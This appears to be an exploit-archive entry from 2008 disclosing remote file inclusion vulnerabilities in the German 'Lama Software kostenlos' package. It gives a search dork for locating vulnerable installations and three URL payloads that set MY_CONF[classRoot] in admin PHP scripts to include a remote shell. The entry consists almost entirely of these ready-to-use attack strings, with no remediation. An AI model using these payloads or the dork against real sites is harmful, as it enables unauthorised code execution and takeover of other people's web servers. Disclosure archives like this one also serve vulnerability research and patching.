id: 2528
date: 01/21/2008
title: Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities
author: QTRinux
cves: 

=========================================================================
Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities
=========================================================================


[+]----------------------------------------------------------------------------[+]
 Lama Software kostenlos  Remote file include
Scripts         : Lama Software kostenlos
Discovered By   : QTRinux
Scripts site    : http://www.lama-software.de/
dork        : © 2007 by Lama Software - Accomm Solutions GmbH & Co. KG
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
admin/functions/inc.steps.access_error.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



#  0day.today [2023-03-23]  #